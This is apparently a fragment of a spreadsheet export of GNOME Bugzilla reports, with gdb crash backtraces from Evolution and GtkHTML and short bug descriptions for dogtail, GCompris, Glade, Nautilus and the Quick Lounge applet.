[New Thread 1155955632 (LWP 7980)]
[New Thread 1147550640 (LWP 7979)]
[New Thread 1138756528 (LWP 7976)]
[New Thread 1128967088 (LWP 7975)]
[New Thread 1120574384 (LWP 7957)]
[New Thread 1112181680 (LWP 7956)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0x40f6994b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0x404464f2 in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:741
#3  0x08066baf in es_menu_hook_get_type ()
#4  
#5  0x4038387e in op_helper (self=0x85ab748 e=0x82a8538
from=0x874df78 
    to=0x874df60 left=0x0 right=0x0 len=0x82a8578 cut=0) at
htmlclue.c:148
#6  0x40383a7f in op_copy (self=0x874df60 parent=0x0 e=0x874df60 
    from=0x874df60 to=0x874df60 len=0x874df60) at htmlclue.c:177
#7  0x403b9394 in html_object_op_copy (self=0x874df78 parent=0x874df60
    e=0x874df60 from=0x874df60 to=0x874df60 len=0x874df60)
    at htmlobject.c:752
#8  0x40394540 in html_engine_copy_object (e=0x82a8538 o=0x82a8574 
    len=0x82a8578) at htmlengine-edit-cut-and-paste.c:371
#9  0x403c3722 in html_engine_activate_selection (e=0x82a8538
time=141877112)
    at htmlselection.c:402
#10 0x403c3789 in html_engine_update_selection_active_state
(e=0x82a8538 
    time=0) at htmlselection.c:422
#11 0x40380742 in gtk_html_select_word (html=0x829b158) at
gtkhtml.c:5239
#12 0x4037628f in button_press_event (widget=0x829b158
event=0x8118340)
    at gtkhtml.c:1754
#13 0x40c86922 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80be2f8 
    return_value=0xbffff170 n_param_values=2 param_values=0xbffff2b0
    invocation_hint=0xbffff198 marshal_data=0x403761a0) at
gtkmarshalers.c:83
#14 0x410970c9 in g_type_class_meta_marshal (closure=0x80be2f8 
    return_value=0x874df60 n_param_values=141877088 
    param_values=0xbffff2b0 invocation_hint=0x874df60 
    marshal_data=0x874df60) at gclosure.c:514
#15 0x41096e36 in IA__g_closure_invoke (closure=0x80be2f8 
    return_value=0x874df60 n_param_values=141877088
param_values=0x874df60 
    invocation_hint=0x874df60) at gclosure.c:437
#16 0x410a9515 in signal_emit_unlocked_R (node=0x80be348 detail=0 
    instance=0x829b158 emission_return=0xbffff250 
    instance_and_params=0xbffff2b0) at gsignal.c:2480
#17 0x410a890a in IA__g_signal_emit_valist (instance=0x829b158
signal_id=0 
    detail=0 var_args=0xbffff440
XÃ´Ã¿Â¿@\203\021\bhÃ´Ã¿Â¿ÃÂ°Ã˜@XÃ´Ã¿Â¿)
    at gsignal.c:2211
#18 0x410a8db6 in IA__g_signal_emit (instance=0x874df60
signal_id=141877088 
    detail=141877088) at gsignal.c:2245
#19 0x40d8b3e4 in gtk_widget_event_internal (widget=0x829b158 
    event=0x8118340) at gtkwidget.c:3587
#20 0x40c84de4 in IA__gtk_propagate_event (widget=0x829b158
event=0x8118340)
    at gtkmain.c:2145
#21 0x40c83a78 in IA__gtk_main_do_event (event=0x8118340) at
gtkmain.c:1383
#22 0x40fbf3a5 in gdk_event_dispatch (source=0x874df60 callback=0 
    user_data=0x0) at gdkevents-x11.c:2218
#23 0x410f0042 in g_main_dispatch (context=0x80a9530) at gmain.c:1947
#24 0x410f10f8 in IA__g_main_context_dispatch (context=0x80a9530)
    at gmain.c:2497
#25 0x410f1430 in g_main_context_iterate (context=0x80a9530 block=1 
    dispatch=1 self=0x8077448) at gmain.c:2578
#26 0x410f19d3 in IA__g_main_loop_run (loop=0x80ebe80) at gmain.c:2782
#27 0x40914c58 in bonobo_main () at bonobo-main.c:297
#28 0x08067282 in main ()
Thread 8 (Thread 1112181680 (LWP 7956)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40f6628e in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x4008fca2 in e_msgport_wait () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#3  0x40090543 in e_thread_busy () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#4  0x40f63ae5 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 7 (Thread 1120574384 (LWP 7957)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40f6628e in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x4008fca2 in e_msgport_wait () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#3  0x40090543 in e_thread_busy () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#4  0x40f63ae5 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 6 (Thread 1128967088 (LWP 7975)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40f6628e in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x4008fca2 in e_msgport_wait () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#3  0x40090543 in e_thread_busy () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#4  0x40f63ae5 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 5 (Thread 1138756528 (LWP 7976)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40f6628e in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x4008fca2 in e_msgport_wait () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#3  0x40090543 in e_thread_busy () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#4  0x40f63ae5 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 4 (Thread 1147550640 (LWP 7979)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40f6628e in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x4008fca2 in e_msgport_wait () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#3  0x40090543 in e_thread_busy () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#4  0x40f63ae5 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 3 (Thread 1155955632 (LWP 7980)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40f6628e in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x4008fca2 in e_msgport_wait () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#3  0x40090543 in e_thread_busy () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#4  0x40f63ae5 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 1164467120 (LWP 7981)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40f6628e in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x4008fca2 in e_msgport_wait () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#3  0x40090543 in e_thread_busy () from
/usr/lib/evolution/2.2/libeutil.so.0
No symbol table info available.
#4  0x40f63ae5 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 1094795648 (LWP 7951)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40f6994b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x404464f2 in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:741
	estatus = 134841804
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {385024 1091250561 1 0 141827132 141827180 
      3758100482 1 1 1077857272 4 134839952 3221220216
1079637568 
      138253872 3221220248 64 3221220528 1089898731 1089898740
110 
      1080245768 134839952 134814056 3221220296 1079824845
134839952 
      3221220560 4 1091249841 134839952 138230636}} 
  sa_flags = -1073747000 
  sa_restorer = 0x410b2981 }
	pid = 0
#3  0x08066baf in es_menu_hook_get_type ()
No symbol table info available.
#4  
No symbol table info available.
#5  0x4038387e in op_helper (self=0x85ab748 e=0x82a8538
from=0x874df78 
    to=0x874df60 left=0x0 right=0x0 len=0x82a8578 cut=0) at
htmlclue.c:148
	cc = (HTMLObject *) 0x874d268
	o = (HTMLObject *) 0x1
	last = (HTMLObject *) 0x1
	cnext = (HTMLObject *) 0x40353000
	child = (HTMLObject *) 0x874df60
#6  0x40383a7f in op_copy (self=0x874df60 parent=0x0 e=0x874df60 
    from=0x874df60 to=0x874df60 len=0x874df60) at htmlclue.c:177
No locals.
#7  0x403b9394 in html_object_op_copy (self=0x874df78 parent=0x874df60
    e=0x874df60 from=0x874df60 to=0x874df60 len=0x874df60)
    at htmlobject.c:752
No locals.
#8  0x40394540 in html_engine_copy_object (e=0x82a8538 o=0x82a8574 
    len=0x82a8578) at htmlengine-edit-cut-and-paste.c:371
	from = (GList *) 0x874df6c
	to = (GList *) 0x874df54
#9  0x403c3722 in html_engine_activate_selection (e=0x82a8538
time=141877112)
    at htmlselection.c:402
No locals.
#10 0x403c3789 in html_engine_update_selection_active_state
(e=0x82a8538 
    time=0) at htmlselection.c:422
No locals.
#11 0x40380742 in gtk_html_select_word (html=0x829b158) at
gtkhtml.c:5239
	e = (HTMLEngine *) 0x82a8538
#12 0x4037628f in button_press_event (widget=0x829b158
event=0x8118340)
    at gtkhtml.c:1754
	html = (GtkHTML *) 0x829b158
	orig_widget = (GtkWidget *) 0x829b158
	engine = (HTMLEngine *) 0x82a8538
	value = 141877088
	x = 605
	y = 32
#13 0x40c86922 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80be2f8 
    return_value=0xbffff170 n_param_values=2 param_values=0xbffff2b0
    invocation_hint=0xbffff198 marshal_data=0x403761a0) at
gtkmarshalers.c:83
	callback = 0x403761a0 
	data1 = 0x829b158
	data2 = 0x80b5b50
	v_return = 141877088
#14 0x410970c9 in g_type_class_meta_marshal (closure=0x80be2f8 
    return_value=0x874df60 n_param_values=141877088 
    param_values=0xbffff2b0 invocation_hint=0x874df60 
    marshal_data=0x874df60) at gclosure.c:514
	class = (GTypeClass *) 0x874df78
	callback = 0x874df60
#15 0x41096e36 in IA__g_closure_invoke (closure=0x80be2f8 
    return_value=0x874df60 n_param_values=141877088
param_values=0x874df60 
    invocation_hint=0x874df60) at gclosure.c:437
	marshal = 0x41097080 
	marshal_data = 0xb0
	in_marshal = 0
#16 0x410a9515 in signal_emit_unlocked_R (node=0x80be348 detail=0 
    instance=0x829b158 emission_return=0xbffff250 
    instance_and_params=0xbffff2b0) at gsignal.c:2480
	tmp = (Handler *) 0xbffff198
	handler = (Handler *) 0x0
	accumulator = (SignalAccumulator *) 0x80bd7c0
	emission = {next = 0x0 instance = 0x829b158 ihint = {
    signal_id = 42 detail = 0 run_type = G_SIGNAL_RUN_LAST} 
  state = EMISSION_RUN chain_type = 136930760}
	handler_list = (Handler *) 0x8295d70
	return_accu = (GValue *) 0xbffff170
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 42
	max_sequential_handler_number = 3487
	return_value_altered = 1
#17 0x410a890a in IA__g_signal_emit_valist (instance=0x829b158
signal_id=0 
    detail=0 var_args=0xbffff440
XÃ´Ã¿Â¿@\203\021\bhÃ´Ã¿Â¿ÃÂ°Ã˜@XÃ´Ã¿Â¿)
    at gsignal.c:2211
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	rtype = 141877088
	instance_and_params = (GValue *) 0xbffff2b0
	stack_values = {{g_type = 136930760 data = {{v_int = 136950104 
        v_uint = 136950104 v_long = 136950104 v_ulong = 136950104 
        v_int64 = 136950104 v_uint64 = 136950104 v_float =
5.10650542e-34 
        v_double = 6.7662341580785882e-316 v_pointer = 0x829b158} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 134996272 data = {{v_int = 135365440 v_uint = 135365440
        v_long = 135365440 v_ulong = 135365440 v_int64 = 135365440 
        v_uint64 = 135365440 v_float = 4.37886339e-34 
        v_double = 6.6879413538184509e-316 v_pointer = 0x8118340} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
        v_pointer = 0x8000000}}} {g_type = 134687164 data = {{
        v_int = 1091319568 v_uint = 1091319568 v_long = 1091319568 
        v_ulong = 1091319568 v_int64 = 593770399310558992 
        v_uint64 = 593770399310558992 v_float = 8.76344299 
        v_double = 5.5832907514773936e-269 v_pointer = 0x410c3710} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = -4611700277718810623 v_uint64 = 13835043795990740993
        v_float = 1.40129846e-45 v_double = -1.9968338012695315 
        v_pointer = 0x1}}} {g_type = 1091158906 data = {{v_int =
138247944 
        v_uint = 138247944 v_long = 138247944 v_ulong = 138247944 
        v_int64 = 343735631624 v_uint64 = 343735631624 
        v_float = 5.70244432e-34 v_double = 1.6982796683696037e-312 
        v_pointer = 0x83d7f08} {v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 4683482633072541697 
        v_uint64 = 4683482633072541697 v_float = 1.40129846e-45 
        v_double = 127274.25000000001 v_pointer = 0x1}}} {
    g_type = 1090458276 data = {{v_int = 135365516 v_uint = 135365516
        v_long = 135365516 v_ulong = 135365516 
        v_int64 = -4611699040632863860 v_uint64 = 13835045033076687756
        v_float = 4.37889829e-34 v_double = -1.9971084895298388 
        v_pointer = 0x811838c} {v_int = 1090244937 v_uint =
1090244937 
        v_long = 1090244937 v_ulong = 1090244937 
        v_int64 = 593770399309484361 v_uint64 = 593770399309484361 
        v_float = 7.8692975 v_double = 5.5832907507547179e-269 
        v_pointer = 0x40fbd149}}} {g_type = 135365516 data = {{v_int =
64 
        v_uint = 64 v_long = 64 v_ulong = 64 
        v_int64 = 4686885471236653120 v_uint64 = 4686885471236653120 
        v_float = 8.96831017e-44 v_double = 222512.12500000186 
        v_pointer = 0x40} {v_int = 138225880 v_uint = 138225880 
        v_long = 138225880 v_ulong = 138225880 
        v_int64 = 593675634199046360 v_uint64 = 593675634199046360 
        v_float = 5.69231303e-34 v_double = 5.5195624165994531e-269 
        v_pointer = 0x83d28d8}}} {g_type = 3221222328 data = {{
        v_int = 1091249841 v_uint = 1091249841 v_long = 1091249841 
        v_ulong = 1091249841 v_int64 = 593675635152070321 
        v_uint64 = 593675635152070321 v_float = 8.69694614 
        v_double = 5.5195630574959725e-269 v_pointer = 0x410b26b1} {
        v_int = 134869568 v_uint = 134869568 v_long = 134869568 
        v_ulong = 134869568 v_int64 = -4611699590389173696 
        v_uint64 = 13835044483320377920 v_float = 4.15117014e-34 
        v_double = -1.9969864191072162 v_pointer = 0x809f240}}} {
    g_type = 1090156888 data = {{v_int = 140386928 v_uint = 140386928
        v_long = 140386928 v_ulong = 140386928 v_int64 = 140386928 
        v_uint64 = 140386928 v_float = 6.6846176e-34 
        v_double = 6.9360358249988578e-316 v_pointer = 0x85e2270} {
        v_int = 140202112 v_uint = 140202112 v_long = 140202112 
        v_ulong = 140202112 v_int64 = 4682497238866022528 
        v_uint64 = 4682497238866022528 v_float = 6.59975426e-34 
        v_double = 112934.87704020925 v_pointer = 0x85b5080}}} {
    g_type = 3758104578 data = {{v_int = 134869432 v_uint = 134869432
        v_long = 134869432 v_ulong = 134869432 v_int64 = 4429836728 
        v_uint64 = 4429836728 v_float = 4.15110769e-34 
        v_double = 2.1886301439905944e-314 v_pointer = 0x809f1b8} {
        v_int = 1090458276 v_uint = 1090458276 v_long = 1090458276 
        v_ulong = 1090458276 v_int64 = 593675635151278756 
        v_uint64 = 593675635151278756 v_float = 7.97102547 
        v_double = 5.5195630569636551e-269 v_pointer = 0x40ff12a4}}}
{
    g_type = 138225880 data = {{v_int = -1073745016 v_uint =
3221222280 
        v_long = -1073745016 v_ulong = 3221222280 
        v_int64 = 4682525910853743496 v_uint64 = 4682525910853743496 
        v_float = -1.99961948 v_double = 113352.10937495355 
        v_pointer = 0xbffff388} {v_int = 138225880 v_uint = 138225880
        v_long = 138225880 v_ulong = 138225880 
        v_int64 = 579259799808321752 v_uint64 = 579259799808321752 
        v_float = 5.69231303e-34 v_double = 6.1386719029848425e-270 
        v_pointer = 0x83d28d8}}} {g_type = 134868552 data = {{
        v_int = 1091250561 v_uint = 1091250561 v_long = 1091250561 
        v_ulong = 1091250561 v_int64 = 593675635152071041 
        v_uint64 = 593675635152071041 v_float = 8.69763279 
        v_double = 5.5195630574964567e-269 v_pointer = 0x410b2981} {
        v_int = 138247944 v_uint = 138247944 v_long = 138247944 
        v_ulong = 138247944 v_int64 = -4611699590385795320 
        v_uint64 = 13835044483323756296 v_float = 5.70244432e-34 
        v_double = -1.9969864198573664 v_pointer = 0x83d7f08}}} {
    g_type = 1091249841 data = {{v_int = 138225880 v_uint = 138225880
        v_long = 138225880 v_ulong = 138225880 
        v_int64 = 579256020237101272 v_uint64 = 579256020237101272 
        v_float = 5.69231303e-34 v_double = 6.1354947608833204e-270 
        v_pointer = 0x83d28d8} {v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 4686885471236653057 
        v_uint64 = 4686885471236653057 v_float = 1.40129846e-45 
        v_double = 222512.12500000003 v_pointer = 0x1}}} {
    g_type = 1090458276 data = {{v_int = 138247944 v_uint = 138247944
        v_long = 138247944 v_ulong = 138247944 
        v_int64 = -4611699452946841848 v_uint64 = 13835044620762709768
        v_float = 5.70244432e-34 v_double = -1.9970169374354914 
        v_pointer = 0x83d7f08} {v_int = 1090309374 v_uint =
1090309374 
        v_long = 1090309374 v_ulong = 1090309374 
        v_int64 = -2305825411642372866 v_uint64 = 16140918662067178750
        v_float = 7.90002346 v_double = -2.6920396424690573e+154 
        v_pointer = 0x40fcccfe}}} {g_type = 134865560 data = {{v_int =
1 
        v_uint = 1 v_long = 1 v_ulong = 1 v_int64 =
4683482633072541697 
        v_uint64 = 4683482633072541697 v_float = 1.40129846e-45 
        v_double = 127274.25000000001 v_pointer = 0x1} {v_int =
134866784 
        v_uint = 134866784 v_long = 134866784 v_ulong = 134866784 
        v_int64 = 593770398354106208 v_uint64 = 593770398354106208 
        v_float = 4.14989179e-34 v_double = 5.5832901082750342e-269 
        v_pointer = 0x809e760}}} {g_type = 3221222376 data = {{
        v_int = 1091249841 v_uint = 1091249841 v_long = 1091249841 
        v_ulong = 1091249841 v_int64 = 579248427687945905 
        v_uint64 = 579248427687945905 v_float = 8.69694614 
        v_double = 6.1291123946909117e-270 v_pointer = 0x410b26b1} {
        v_int = 134868704 v_uint = 134868704 v_long = 134868704 
        v_ulong = 134868704 v_int64 = 4429836000 v_uint64 =
4429836000 
        v_float = 4.15077341e-34 v_double = 2.1886297843108042e-314 
        v_pointer = 0x809eee0}}} {g_type = 1091250561 data = {{
        v_int = 137999976 v_uint = 137999976 v_long = 137999976 
        v_ulong = 137999976 v_int64 = 579259387491235432 
        v_uint64 = 579259387491235432 v_float = 5.588583e-34 
        v_double = 6.1383253054747795e-270 v_pointer = 0x839b668} {
        v_int = -1073744888 v_uint = 3221222408 v_long = -1073744888
        v_ulong = 3221222408 v_int64 = 4682182996369863688 
        v_uint64 = 4682182996369863688 v_float = -1.99963474 
        v_double = 108362.04687495541 v_pointer = 0xbffff408}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 0
	param_values = (GValue *) 0xbffff2c4
	i = 1
	n_params = 1
#18 0x410a8db6 in IA__g_signal_emit (instance=0x874df60
signal_id=141877088 
    detail=141877088) at gsignal.c:2245
No locals.
#19 0x40d8b3e4 in gtk_widget_event_internal (widget=0x829b158 
    event=0x8118340) at gtkwidget.c:3587
	signal_num = 141877088
	return_val = 0
#20 0x40c84de4 in IA__gtk_propagate_event (widget=0x829b158
event=0x8118340)
    at gtkmain.c:2145
	tmp = (GtkWidget *) 0x829b158
	handled_event = 135365440
#21 0x40c83a78 in IA__gtk_main_do_event (event=0x8118340) at
gtkmain.c:1383
	event_widget = (GtkWidget *) 0x829b158
	grab_widget = (GtkWidget *) 0x829b158
	window_group = (GtkWindowGroup *) 0x83cd220
	next_event = (GdkEvent *) 0x874df78
	rewritten_event = (GdkEvent *) 0x0
	tmp_list = (GList *) 0x829b158
#22 0x40fbf3a5 in gdk_event_dispatch (source=0x874df60 callback=0 
    user_data=0x0) at gdkevents-x11.c:2218
	display = (GdkDisplay *) 0x8118340
	event = (GdkEvent *) 0x8118340
#23 0x410f0042 in g_main_dispatch (context=0x80a9530) at gmain.c:1947
	dispatch = (gboolean (*)(GSource * GSourceFunc 
    gpointer)) 0x40fbf320 
	was_in_call = 0
	user_data = 0x0
	callback = 0
	cb_funcs = (GSourceCallbackFuncs *) 0x0
	cb_data = 0x0
	need_destroy = 1089886196
	source = (GSource *) 0x80a94e8
	depth = (gint *) 0x80b3e98
	i = 0
#24 0x410f10f8 in IA__g_main_context_dispatch (context=0x80a9530)
    at gmain.c:2497
No locals.
#25 0x410f1430 in g_main_context_iterate (context=0x80a9530 block=1 
    dispatch=1 self=0x8077448) at gmain.c:2578
	got_ownership = 141877088
	max_priority = 0
	timeout = 0
	some_ready = 1
	nfds = 1
	allocated_nfds = 0
	fds = (GPollFD *) 0x86132e0
#26 0x410f19d3 in IA__g_main_loop_run (loop=0x80ebe80) at gmain.c:2782
	got_ownership = 1073789920
	self = (GThread *) 0x8077448
#27 0x40914c58 in bonobo_main () at bonobo-main.c:297
	loop = (GMainLoop *) 0x80ebe80
#28 0x08067282 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>DOGTAIL-320563</t>
  </si>
  <si>
    <t>DOGTAIL</t>
  </si>
  <si>
    <t>version number is dogtail.spec does not match</t>
  </si>
  <si>
    <t>Please describe the problem:
Version number in dogtail.spec is 0.4.3 as a result make rpm fails. Changing
to 0.4.4 to reflect the current version works.
Steps to reproduce:
1. cvs co dogtail
2. make rpm
3. 
Actual results:
unable to create rpm
Expected results:
rpm created
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>dogtail-maint</t>
  </si>
  <si>
    <t>llim</t>
  </si>
  <si>
    <t>GCOMPRIS-331476</t>
  </si>
  <si>
    <t>GCOMPRIS</t>
  </si>
  <si>
    <t>Window is located incorrectly in xinerama mode</t>
  </si>
  <si>
    <t>Please describe the problem:
When using xinerama (desktop stretched to two physical displays) GCompris
window tries to position itself incorrectly between two screens (displays). 
Program should be located only in one window. Now user is able to see lots of
black space and a half of GCompris window in left screen. The right screen
doesn't even show the rest of the GCompris window but a normal portion of
desktop instead so half of the Gcompris screen disappears.
Steps to reproduce:
1. Configure X in xinerama mode two displays same resolutions in both.
2. Start GCompris
3. 
Actual results:
I see only half of the window positioned incorrectly between two screens.
Expected results:
See the window centered in one screen.
Does this happen every time?
Always
Other information:
I'm using GCompris 6.5.3 in Ubuntu 5.10 Gnome 2.12.1 X.org 6.8.2. Graphics
card is Matrox G450 dualhead with Matrox binary HAL library.</t>
  </si>
  <si>
    <t>bruno.coudoin</t>
  </si>
  <si>
    <t>tom.ingberg</t>
  </si>
  <si>
    <t>GLADE-312398</t>
  </si>
  <si>
    <t>The Do you really want to quit? dialog</t>
  </si>
  <si>
    <t>The dialog should be centered to the screen. Currently the dialog is aligned to
Glade's master window which often is in the top left corner which makes it so
the dialog often is not fully visible.</t>
  </si>
  <si>
    <t>NAUTILUS-46664</t>
  </si>
  <si>
    <t>metadata code ignores CORBA-reported errors</t>
  </si>
  <si>
    <t xml:space="preserve">The new metadata code in nautilus-directory-metafile.c ignores any errors which
are reported by the CORBA_environment.
------- Additional Comments From engber@eazel.com 2001-02-20 10:25:35 ----
Also in nautilus-metfile.c. There are FIXMEs in both files about this.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:00 -------
The original reporter (engber@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
The original owner (engber@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>engber</t>
  </si>
  <si>
    <t>QUICK-LOUNGE-APPLET-314818</t>
  </si>
  <si>
    <t>QUICK-LOUNGE-APPLET</t>
  </si>
  <si>
    <t>Port to new libgnomemenu API</t>
  </si>
  <si>
    <t>See patch.</t>
  </si>
  <si>
    <t>glynnfoster</t>
  </si>
  <si>
    <t>EVOLUTION-253137</t>
  </si>
  <si>
    <t>Crash when opening an empty calendar entry</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable
Package: Evolution
Priority: Normal
Version: GNOME2.4.1 unspecified
Gnome-Distributor: Debian
Synopsis: Crash when opening an empty calendar entry
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.5.3)
Description:
When I choosed the list view i noticed a couple of empty entries i.e
they had no 
summary and no date. When trying to open one of them to check it out
evolution crashed upon me.
Evolution build with jhbuild from anon cvs on Jan 15.
/torkel
Debugging Information:
Backtrace was generated from '/lap/gnome/CVS/bin/evolution-1.5'
[New Thread 16384 (LWP 13604)]
[New Thread 32769 (LWP 13613)]
[New Thread 16386 (LWP 13614)]
[New Thread 196611 (LWP 13627)]
[New Thread 49156 (LWP 13616)]
[New Thread 65541 (LWP 13617)]
[New Thread 81926 (LWP 13618)]
[New Thread 98311 (LWP 13619)]
[New Thread 213000 (LWP 13628)]
[New Thread 131081 (LWP 13621)]
[New Thread 147466 (LWP 13622)]
[New Thread 278539 (LWP 13643)]
[New Thread 294924 (LWP 13644)]
[New Thread 311309 (LWP 13645)]
[New Thread 344078 (LWP 13777)]
0x4018d54b in waitpid () from /lib/libc.so.6
#0  0x4018d54b in waitpid () from /lib/libc.so.6
#1  0x405a2d24 in __JCR_LIST__ () from
/lap/gnome/CVS/lib/libgnomeui-2.so.0
#2  0xffffff90 in ?? ()
#3  0x40567b34 in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:738
#4  0x08064dd1 in segv_redirect (sig=11) at main.c:483
#5  0x4136a7f5 in __pthread_sighandler () from /lib/libpthread.so.0
#6  
#7  0x41fa6dd0 in update_time (epage=0x9359d38 start_date=0x0
end_date=0xbfffeab8) at event-page.c:318
#8  0x41fa7289 in event_page_fill_widgets (page=0x9359d38
comp=0x9104c00) at event-page.c:460
#9  0x41fa251a in comp_editor_page_fill_widgets (page=0x9359d38
comp=0x9104c00) at comp-editor-page.c:245
#10 0x41fa0721 in fill_widgets (editor=0x1) at comp-editor.c:1000
#11 0x41fa097d in real_edit_comp (editor=0x90034c0 comp=0x87f6f48) at
comp-editor.c:1060
#12 0x41fa5ccc in event_editor_edit_comp (editor=0x90034c0
comp=0x87f6f48) at event-editor.c:271
#13 0x41fa0c0d in comp_editor_edit_comp (editor=0x90034c0
comp=0x87f6f48) at comp-editor.c:1115
#14 0x41f3fe83 in e_calendar_view_edit_appointment (cal_view=0x90034c0
client=0x87f6f48 icalcomp=0x9b95dc8 meeting=0) at e-cal-view.c:1540
#15 0x41f3edc5 in on_edit_appointment (widget=0x90ee7b8 user_data=0x1)
at e-cal-view.c:989
#16 0x414efdd1 in g_cclosure_marshal_VOID__VOID (closure=0x966da58
return_value=0x0 n_param_values=1 param_values=0x1
invocation_hint=0xbfffed78 
    marshal_data=0x0) at gmarshal.c:77
#17 0x414da4c0 in g_closure_invoke (closure=0x966da58 return_value=0x1
n_param_values=1 param_values=0x1 invocation_hint=0x1) at
gclosure.c:437
#18 0x414ef875 in signal_emit_unlocked_R (node=0x8229e80 detail=0
instance=0x90ee7b8 emission_return=0x0
instance_and_params=0xbfffee80)
    at gsignal.c:2436
#19 0x414ee837 in g_signal_emit_valist (instance=0x90ee7b8
signal_id=170 detail=0 
    var_args=0xbffff00c
\004`\020Ã Ã°Â©&amp;AÂ°7\001\t(Ã°Ã¿Â¿\213\227TAÃ°Â©&amp;A
